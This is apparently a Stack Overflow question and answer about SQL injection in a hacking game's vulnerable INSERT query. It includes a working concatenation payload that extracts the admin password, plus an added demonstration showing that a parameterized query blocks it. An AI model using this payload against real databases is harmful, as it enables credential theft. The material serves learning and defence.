
Is there a way to do a SQL injection without using the single quote '?

I've looked at a lot of questions, but they are all about single quote escaping or they do not contain a solution (SQL Injection after removing all single-quotes and dash-characters).

I'm doing a hack game and basically I have to extract a password from a DB; I'm trying to do it by exploiting this query:

# Query from the question: the user-supplied `data` is spliced into the SQL text with %s
# before SQLAlchemy ever sees it, so it is parsed as SQL rather than bound as a value.
from sqlalchemy import text

query = text("INSERT INTO data_table VALUES ([other values], '%s')" % data)
db.engine.execute(query, user=username)

trying to set data to:

'SELECT password FROM users WHERE username="admin" '

I think that this way the SELECT should be executed and its result stored as data (I can easily read back that data from the website).

The problem is that when uploading the value that goes into data I cannot use the single quote ' (the system shows an error and I have to choose another value).

Is there a way to perform a similar injection without the single quote?

Stefano Cereda

1 Answer


This SELECT must be passed as a Scalar Subquery enclosed in parentheses.

If data is simply concatenated with text, then setting it to

' || (SELECT password FROM users WHERE username='admin') || '

results in

INSERT INTO data_table VALUES ([other values], '' || (SELECT password FROM users WHERE username='admin') || '')

which is valid SQL concatenating empty strings and the result of the SELECT. Now the DBMS will happily execute it :-)

dnoeth
  • I think in your phrase, you also started with a single quote ;). – shA.t May 17 '15 at 12:56
  • @shA.t: SQL injection doesn't care about rules like "no single quotes allowed" :-) – dnoeth May 17 '15 at 13:29
  • Yes, but I think the OP's question is about a way *without using the single quote* ;). – shA.t May 17 '15 at 13:32
  • @shA.t: IMHO the OP tried to set `data` to `'SELECT password FROM users WHERE username="admin" '` which failed due to the single quote and I showed him how to do it right. Let the OP decide... – dnoeth May 17 '15 at 13:42
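The concatenation the answer describes, reproduced against a constructed in-memory SQLite database next to the parameterized INSERT that stops it (an added example, not code from the question or the answer; the table layout, the demo password and the use of the stdlib sqlite3 driver in place of SQLAlchemy are assumptions made here):

```python
import sqlite3

# Payload quoted from the answer above. Everything else here (table layout,
# the demo password, sqlite3 standing in for SQLAlchemy) is constructed.
PAYLOAD = "' || (SELECT password FROM users WHERE username='admin') || '"


def make_db():
    """In-memory stand-in for the game's database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE users (username TEXT, password TEXT);"
        "INSERT INTO users VALUES ('admin', 'demo-secret');"
        "CREATE TABLE data_table (id INTEGER, data TEXT);"
    )
    return conn


def insert_vulnerable(conn, data):
    """Same pattern as the question: the value is %-formatted into the SQL text,
    so '' || (SELECT ...) || '' is evaluated by the database, not stored."""
    conn.execute("INSERT INTO data_table VALUES (1, '%s')" % data)
    return conn.execute("SELECT data FROM data_table WHERE id = 1").fetchone()[0]


def insert_parameterized(conn, data):
    """Hardened form: the driver binds the value, so it is never parsed as SQL
    and the quotes inside it need no filtering at all."""
    conn.execute("INSERT INTO data_table VALUES (?, ?)", (2, data))
    return conn.execute("SELECT data FROM data_table WHERE id = 2").fetchone()[0]


def demo():
    """Returns (what the vulnerable insert stored, what the safe insert stored)."""
    conn = make_db()
    return insert_vulnerable(conn, PAYLOAD), insert_parameterized(conn, PAYLOAD)


if __name__ == "__main__":
    leaked, stored = demo()
    print("vulnerable insert stored:", leaked)    # the admin password
    print("parameterized insert stored:", stored)  # the payload text, verbatim
```

The contrast is the point for a defender: rejecting single quotes (what the OP's game does) only narrows the payload space, while binding the value as a parameter removes the injection regardless of what characters it contains.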